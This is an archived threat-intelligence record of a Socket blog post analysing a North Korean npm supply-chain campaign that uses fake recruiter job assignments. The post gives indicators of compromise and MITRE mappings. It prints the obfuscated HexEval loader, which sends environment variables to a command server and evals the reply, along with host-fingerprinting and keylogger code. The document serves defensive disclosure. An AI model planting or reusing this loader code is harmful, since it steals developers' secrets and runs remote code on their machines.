{
	"id": "ed8322a1-8c63-4ea3-aeaa-48ec33b9e18a",
	"created_at": "2026-04-06T00:19:13.259946Z",
	"updated_at": "2026-04-10T13:11:37.260686Z",
	"deleted_at": null,
	"sha1_hash": "cb28625bd1f0ca0e3931f170193e91d1d1472b3c",
	"title": "Another Wave: North Korean Contagious Interview Campaign Dro...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3666881,
	"plain_text": "Another Wave: North Korean Contagious Interview Campaign\r\nDro...\r\nArchived: 2026-04-05 17:53:08 UTC\r\nSecure your dependencies with us\r\nSocket proactively blocks malicious open source packages in your code.\r\nInstall\r\nThe Socket Threat Research Team has uncovered an extended and ongoing North Korean supply chain attack that\r\nhides behind typosquatted npm packages. Threat actors linked to the Contagious Interview operation published 35\r\nmalicious packages across 24 npm accounts. Six remain live on the registry ( react-plaid-sdk , sumsub-node-websdk , vite-plugin-next-refresh , vite-loader-svg , node-orm-mongoose , and router-parse ), and\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 1 of 12\n\ntogether have been downloaded over 4,000 times. We have petitioned the npm security team to remove the\r\nremaining live packages and suspend the associated accounts.\r\nEach malicious package contains a hex-encoded loader we call HexEval. When the package installs, HexEval\r\nLoader collects host metadata, decodes its follow-on script, and, when triggered, fetches and runs BeaverTail, the\r\ninfostealing second-stage malware linked to the Democratic People’s Republic of Korea (DPRK) attackers.\r\nBeaverTail, in turn, references a third-stage backdoor InvisibleFerret, giving the threat actors layered control over\r\nthe victim’s machine. This nesting-doll structure helps the campaign evade basic static scanners and manual\r\nreviews. One npm alias also shipped a cross-platform keylogger package that captures every keystroke, showing\r\nthe threat actors’ readiness to tailor payloads for deeper surveillance when the target warrants it.\r\nPosing as recruiters on LinkedIn, the North Korean threat actors send coding “assignments” to developers and job\r\nseekers via Google Docs, embed these malicious packages within the project, and often pressure candidates to run\r\nthe code outside containerized environments while screen-sharing.\r\nEarlier campaigns embedded obfuscated BeaverTail directly in packages. Once security researchers exposed that\r\ntactic, the threat group pivoted to HexEval Loader, which fetches BeaverTail on demand and leaves minimal\r\nevidence in the registry. We first documented this shift in April 2025, when the npm account crouch626\r\npublished four malicious modules ( cln-logger , node-clog , consolidate-log , and consolidate-logger ).\r\nThe first two carried a HexEval Loader, whereas the others concealed an obfuscated copy of BeaverTail malware.\r\nSince then we have tracked dozens more packages, and believe the true count is higher because npm removed\r\nseveral shortly after publication. The campaign is still active, and we expect additional malicious packages to\r\nsurface.\r\nDiamond model of intrusion analysis overview of the HexEval Loader campaign, linking North Korean\r\nContagious Interview threat actors ( Adversary ) to their C2 servers, npm accounts, and fake recruiter\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 2 of 12\n\nprofiles ( Infrastructure ), the HexEval Loader, BeaverTail, InvisibleFerret, and a keylogger\r\n( Capabilities ), and the targeted job-seekers and developers approached on LinkedIn ( Victim ).\r\nAnatomy of a HexEval Loader#\r\nThe threat actors follow a consistent naming and typosquatting playbook. They reuse well-known patterns such as\r\nvite-plugin-* , react-* , *-logger , json* , and typosquat popular projects, for example reactbootstraps\r\nmasquerades as react-bootstrap and react-plaid-sdk echoes the legitimate react-plaid-link . Behind the\r\nfamiliar branding sits a compact malware loader (HexEval) that appears harmless on cursory review. The\r\nfollowing excerpt from serverlog-dispatch illustrates the typical HexEval Loader pattern:\r\n// Decode a hex-encoded string at run time\r\nfunction g(h) {\r\n return h.replace(/../g, m =\u003e String.fromCharCode(parseInt(m, 16)));\r\n}\r\nconst hl = [\r\n g('72657175697265'), // require\r\n g('6178696f73'), // axios\r\n g('706f7374'), // post\r\n g('687474703a2f2f69702d636865636b2d7365727665722e76657263656c2e6170702f6170692f69702d636865636b2f323038'),\r\n // C2 endpoint:\r\n // hxxp://ip-check-server[.]vercel[.]app/api/ip-check/208\r\n g('7468656e') // then\r\n];\r\n// Send environment data to the C2 endpoint, receive a script, then execute it\r\nmodule.exports = () =\u003e\r\n require(hl[1])[hl[2]](hl[3], { ...process.env })\r\n [hl[4]](r =\u003e eval(r.data))\r\n .catch(() =\u003e {});\r\nTo evade static analysis, the threat actors encode module names and C2 URLs as hexadecimal strings. The helper\r\nfunction g reverses this obfuscation by converting each two-character hex byte back into its ASCII\r\nrepresentation. Once decoded, the loader issues an HTTPS POST request to its C2 server, retrieves a second-stage\r\npayload, and executes it by calling eval() . The operation in the identified packages alternates among three\r\nhardcoded C2 endpoints: hxxps://log-server-lovat[.]vercel[.]app/api/ipcheck/703 , hxxps://ip-check-server[.]vercel[.]app/api/ip-check/208 , and hxxps://ip-check-api[.]vercel[.]app/api/ipcheck/703 . In at\r\nleast one malicious packages cluster, a victim captured and analyzed the returned second-stage payload,\r\nconfirming its malicious behavior. However, these endpoints often return only IP geolocation data or undefined ,\r\nsuggesting that the backend selectively serves malicious code based on request headers, execution environment, or\r\nother runtime conditions. This conditional logic complicates detection and raises important questions about how\r\nand when eval(r.data) executes its payload.\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 3 of 12\n\nSeveral variants, including react-plaid-sdk , embed extra reconnaissance code in addition to the loader\r\nfunctionality, as shown in the following excerpt:\r\n// Host fingerprinting\r\nconst data = {\r\n ...process.env, // Extract environment variables\r\n platform: os.platform(), // Operating system\r\n hostname: os.hostname(), // Machine host name\r\n username: os.userInfo().username, // Current user account\r\n macAddresses: getMacAddress() // MAC address for device fingerprinting\r\n};\r\nThe npm alias jtgleason also published jsonsecs , a package that supplements the HexEval Loader with a\r\ncross-platform keylogger, enabling keystroke capture on Windows, macOS, and Linux systems when the threat\r\nactors require deeper surveillance.\r\nconst os_1 = __importDefault(require(\"os\")); // Node’s OS module\r\nconst MacKeyServer_1 = require(\"./ts/MacKeyServer\"); // macOS keylogger\r\nconst WinKeyServer_1 = require(\"./ts/WinKeyServer\"); // Windows keylogger\r\nconst X11KeyServer_1 = require(\"./ts/X11KeyServer\"); // Linux/Unix keylogger\r\nThe jsonsecs package includes compiled native binaries and exposes platform-specific keyboard hook\r\nfunctionality. Based on the operating system, it loads one of three binaries to hook into low-level input events:\r\nWindows: WinKeyServer (SHA256:\r\ne58864cc22cd8ec17ae35dd810455d604aadab7c3f145b6c53b3c261855a4bb1 )\r\nmacOS: MacKeyServer (SHA256:\r\n30043996a56d0f6ad4ddb4186bd09ffc1050dcc352f641ce3907d35174086e15 )\r\nLinux: X11KeyServer (SHA256:\r\n6e09249262d9a605180dfbd0939379bbf9f37db076980d6ffda98d650f70a16d )\r\nThe system allows arbitrary handlers (listeners) to receive keystroke data, enabling exfiltration or real-time\r\nsurveillance by the threat actors.\r\nVictim Profile: Developers and Engineers Seeking Work#\r\nThe loveryon cluster (an npm alias that published serverlog-dispatch , mongo-errorlog , next-log-patcher , and vite-plugin-tools ) exposes a well-orchestrated social-engineering routine that begins on\r\nLinkedIn. The threat actors posed as recruiters and approached software engineers with attractive job offers. After\r\na brief exchange they sent coding tasks that instructed the candidates to clone test repositories and make minor\r\nchanges. Buried in those projects was one of the loveryon cluster malicious dependencies carrying the HexEval\r\nLoader (or an inline eval() snippet) that triggered the moment the code ran.\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 4 of 12\n\nA Reddit user describes uncovering four malicious npm packages tied to the North Korean Contagious\r\nInterview operation. The threat actors posed as a recruiter on LinkedIn, lured the user into executing\r\ncode locally, and attempted to exfiltrate data. Running the assignment in a containerized environment,\r\nthe user captured the second-stage payload delivered by the packages ( next-log-patcher , vite-plugin-tools , mongo-errorlog , and serverlog-dispatch ) and linked infrastructure.\r\nSecond-Stage Payload: BeaverTail Malware#\r\nOnce decoded, the HexEval Loader in the loveryon cluster retrieved a second-stage payload (BeaverTail\r\nmalware) from 172[.]86[.]80[.]145:1224 and executed it using eval() . We have previously analyzed\r\nBeaverTail in depth. In brief, it functions as both an infostealer and a loader, designed for targeted data theft and\r\npersistent access. Upon execution, BeaverTail scans local file systems for browser artifacts across approximately\r\n200 profile directories, including those associated with Brave, Chrome, and Opera. It searches for cookies,\r\nIndexedDB files, and extensions such as .log and .ldb that may contain sensitive data. BeaverTail also targets\r\ncryptocurrency wallets, attempting to extract files like Solana’s id.json , Exodus wallet data, and macOS\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 5 of 12\n\nkeychain databases. Its behavior dynamically adjusts based on the host operating system (Windows, macOS, or\r\nLinux).\r\nThe version identified in the loveryon cluster also includes logic to retrieve a third-stage backdoor,\r\nInvisibleFerret. Using either curl or the Node.js request module, BeaverTail downloads additional payloads,\r\nsuch as InvisibleFerret, under e.g. p.zi or p2.zip filenames, which are extracted using tar -xf . This multi-stage deployment mirrors previously observed campaigns tied to North Korean threat actors using the same\r\nmalware family.\r\nThe intrusion begins with social engineering. According multiple victims’ reports, North Korean threat actors\r\ncreate fake recruiter profiles on LinkedIn to impersonate hiring professionals from recruitment companies. They\r\ntarget software engineers who are actively job-hunting, exploiting the trust that job-seekers typically place in\r\nrecruiters. Fake personas initiate contact, often with scripted outreach messages and convincing job descriptions.\r\nThe threat actors used 19 distinct email addresses to register the npm accounts behind the 35 malicious packages\r\nuncovered in this campaign (see IOC section for the full list). Several of these addresses (e.g.\r\nmaria.sam.recruiter@gmail[.]com , toptalent0921@gmail[.]com , and business00747@gmail[.]com ) appear\r\ncrafted to mimic recruiter identities. The threat actors likely created or used these email accounts alongside fake\r\nrecruiter profiles as part of their broader social engineering campaign. By posing as hiring managers or technical\r\nrecruiters, the threat actors exploited job-seeking behavior to build trust and increase the likelihood that targets\r\nwould install and run the malicious code.\r\nAfter initial communication, the threat actors send victims a technical assessment or coding assignment under the\r\nguise of a hiring process. In several cases, once the malicious code is delivered, the fake recruiters delete their\r\nLinkedIn profiles or block the victim, cutting off contact to cover tracks. Victim reports on Reddit consistently\r\ndescribe the same pattern, noting similar job descriptions and identical communication scripts across different\r\nrecruiter personas.\r\nReddit users report coordinated social engineering involving a fake recruiter who directed targets to\r\nclone and run a Bitbucket-hosted project locally. After execution, the recruiter deleted their account.\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 6 of 12\n\nThe assignments direct victims to clone code repositories or install specific npm packages (both of which deliver\r\nmalicious JavaScript payloads). In this campaign, the payload is the HexEval Loader, designed to fingerprint the\r\nhost and retrieve second-stage malware. Once a victim submits the completed assignment, the threat actors often\r\nescalate their tactics. They may request a live video call with a “project manager”, during which they pressure the\r\nvictim to disable Docker or other container environments and run the code natively on their machine while screen\r\nsharing — an attempt to bypass container isolation and ensure full infection.\r\nA threat actor, posing as a recruiter on LinkedIn, pressures the target to bypass containerized\r\nenvironments and execute code directly on the host system.\r\nMultiple victims report this exact sequence. On Reddit, one developer described being asked to “clone it again for\r\na new update and run the app without Docker on a real machine while sharing my screen”. This tactic reflects a\r\ndeliberate effort to ensure execution in a vulnerable context.\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 7 of 12\n\nVictims are approached with lucrative job offers, often advertising remote roles with salaries ranging from\r\n$16,000 to $25,000 per month ($192,000 to $300,000 per year). The job descriptions are shared via Google Docs\r\nor PDFs and are crafted to resemble legitimate listings for positions such as developers, designers, engineers, or\r\nproject managers.\r\nScreenshot of a fraudulent Google Doc job description used by threat actors to lure blockchain\r\ndevelopers with fake remote positions; part of a broader social engineering campaign targeting\r\nsoftware engineers.\r\nScreenshot of a fraudulent coding assignment hosted on Google Docs, instructing blockchain\r\ndevelopers to interact with a Bitbucket repository ( notion-dex/ultrax ) as part of a fake recruitment\r\nprocess.\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 8 of 12\n\nThe targeting appears to follow prior open source intelligence (OSINT) collection. In several cases, the fake\r\nrecruiters reference specific GitHub projects, past experience, and personal details, suggesting a deliberate effort\r\nto personalize the outreach and boost credibility. Once the victim engages, malicious npm packages are discreetly\r\nintroduced, either embedded in the assignment codebase or added as hidden dependencies. This initiates host\r\nreconnaissance and sets the stage for follow-on intrusions and malware execution.\r\nOutlook and Recommendations#\r\nThis malicious campaign highlights an evolving tradecraft in North Korean supply chain attacks, one that blends\r\nmalware staging, OSINT-driven targeting, and social engineering to compromise developers through trusted\r\necosystems. By embedding malware loaders like HexEval in open source packages and delivering them through\r\nfake job assignments, threat actors sidestep perimeter defenses and gain execution on the systems of targeted\r\ndevelopers. The campaign’s multi-stage structure, minimal on-registry footprint, and attempt to evade\r\ncontainerized environments point to a well-resourced adversary refining its intrusion methods in real time.\r\nDefenders should expect continued infiltration of public registries like npm, especially through typosquatting and\r\ndelayed second-stage delivery mechanisms. Given the success of this approach, similar nation-state and criminal\r\nthreat actors may emulate these tactics.\r\nTo defend against sophisticated supply chain attacks like the Contagious Interview campaign, developers and\r\norganizations must adopt proactive security tooling that detects threats before they reach production systems.\r\nTraditional static analysis and package metadata checks are no longer sufficient when attackers weaponize social\r\nengineering and hide malware in seemingly legitimate open source packages.\r\nSocket provides purpose-built defenses to meet these challenges. The Socket GitHub App offers real-time pull\r\nrequest scanning, alerting teams to suspicious or malicious dependencies before they are merged. The Socket CLI\r\nsurfaces red flags during npm install , giving developers immediate insight into the risks of packages\r\nintroduced at the terminal. And the Socket browser extension adds a critical layer of defense by warning users\r\nwhen they visit or download malicious packages from package managers.\r\nIndicators of Compromise (IOCs)#\r\nMalicious npm Packages#\r\n1. react-plaid-sdk\r\n2. sumsub-node-websdk\r\n3. vite-plugin-next-refresh\r\n4. vite-plugin-purify\r\n5. nextjs-insight\r\n6. vite-plugin-svgn\r\n7. node-loggers\r\n8. react-logs\r\n9. reactbootstraps\r\n10. framer-motion-ext\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 9 of 12\n\n11. serverlog-dispatch\r\n12. mongo-errorlog\r\n13. next-log-patcher\r\n14. vite-plugin-tools\r\n15. pixel-percent\r\n16. test-topdev-logger-v1\r\n17. test-topdev-logger-v3\r\n18. server-log-engine\r\n19. logbin-nodejs\r\n20. vite-loader-svg\r\n21. struct-logger\r\n22. flexible-loggers\r\n23. beautiful-plugins\r\n24. chalk-config\r\n25. jsonpacks\r\n26. jsonspecific\r\n27. jsonsecs\r\n28. util-buffers\r\n29. blur-plugins\r\n30. proc-watch\r\n31. node-orm-mongoose\r\n32. prior-config\r\n33. use-videos\r\n34. lucide-node\r\n35. router-parse\r\nThreat Actor Identifiers#\r\nnpm Aliases:\r\n1. liamnevin\r\n2. pablomendes\r\n3. bappda\r\n4. jvinter97\r\n5. eric.c01\r\n6. maryanaaaa\r\n7. npmdev001\r\n8. loveryon\r\n9. supermmm\r\n10. topdev0921\r\n11. hansdev0512\r\n12. abdulrahman_nasser\r\n13. marsinc326\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 10 of 12\n\n14. cristoper52\r\n15. shauncepla\r\n16. marthamoon014\r\n17. jtgleason\r\n18. grace107\r\n19. business00747\r\n20. supercrazybug\r\n21. alexander0110819\r\n22. purpledev07\r\n23. mariasam\r\n24. oleksandrrozgon\r\nEmail Addresses\r\n1. alexander0110819@outlook[.]com\r\n2. maria.sam.recruiter@gmail[.]com\r\n3. toptalent0921@gmail[.]com\r\n4. business00747@gmail[.]com\r\n5. eric.c01.recruit@gmail[.]com\r\n6. hiring.dev.hr@gmail[.]com\r\n7. carrie.bale.recruit@gmail[.]com\r\n8. emilyjobs.rec2023@gmail[.]com\r\n9. mars.recruiting.hiring@gmail[.]com\r\n10. shauncepla.hrteam@gmail[.]com\r\n11. grace.chen.recruitment@gmail[.]com\r\n12. grace107jobs@gmail[.]com\r\n13. abdulrahman.nasser.hr@gmail[.]com\r\n14. marthamoon014@gmail[.]com\r\n15. sofia.helman@outlook[.]com\r\n16. supercrazybug.team@gmail[.]com\r\n17. maryanaaaa.hrteam@gmail[.]com\r\n18. topdev0921@gmail[.]com\r\n19. natalie.dev.hr@gmail[.]com\r\nMalicious Bitbucket Repositories#\r\nhxxps://bitbucket[.]org/notion-dex/ultrax\r\nhxxps://bitbucket[.]org/zoro-workspace/\r\nCommand and Control (C2) Endpoints#\r\nhxxps://log-server-lovat[.]vercel[.]app/api/ipcheck/703\r\nhxxps://ip-check-server[.]vercel[.]app/api/ip-check/208\r\nhxxps://ip-check-api[.]vercel[.]app/api/ipcheck/703\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 11 of 12\n\n172[.]86[.]80[.]145\r\nSHA256 Hashes#\r\ne58864cc22cd8ec17ae35dd810455d604aadab7c3f145b6c53b3c261855a4bb1 — WinKeyServer\r\n30043996a56d0f6ad4ddb4186bd09ffc1050dcc352f641ce3907d35174086e15 — MacKeyServer\r\n6e09249262d9a605180dfbd0939379bbf9f37db076980d6ffda98d650f70a16d — X11KeyServer\r\nMITRE ATT\u0026CK Techniques#\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1056.001 — Input Capture: Keylogging\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages"
	],
	"report_names": [
		"north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434753,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cb28625bd1f0ca0e3931f170193e91d1d1472b3c.pdf",
		"text": "https://archive.orkl.eu/cb28625bd1f0ca0e3931f170193e91d1d1472b3c.txt",
		"img": "https://archive.orkl.eu/cb28625bd1f0ca0e3931f170193e91d1d1472b3c.jpg"
	}
}